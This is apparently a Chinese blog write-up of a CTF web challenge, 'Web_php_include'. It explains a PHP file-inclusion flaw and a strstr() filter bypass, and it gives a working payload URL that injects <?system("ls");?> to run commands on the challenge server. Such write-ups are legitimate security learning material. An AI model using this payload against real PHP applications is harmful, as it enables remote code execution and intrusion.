攻防世界之Web_php_include
题目:
解题思路:
直接给出源码,由代码可知此题应该为文件包含,而且应该利用php伪协议
strstr() 函数搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回FALSE
可以采用http://协议进行绕过利用hello参数将执行内容显示,如图所示得到flag
http://111.200.241.244:58572/?page=http://127.0.0.1/index.php/?hello=%3C?system(%22ls%22);?%3E
======================================================
总结:这题解法还挺多的。php文件包含漏洞。
php伪协议参考:https://www.cnblogs.com/-mo-/p/11736445.html
分类:
攻防世界web-高手进阶
posted on 2022-02-21 23:07 shacker_shen 阅读(42) 评论(0) 编辑 收藏 举报
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】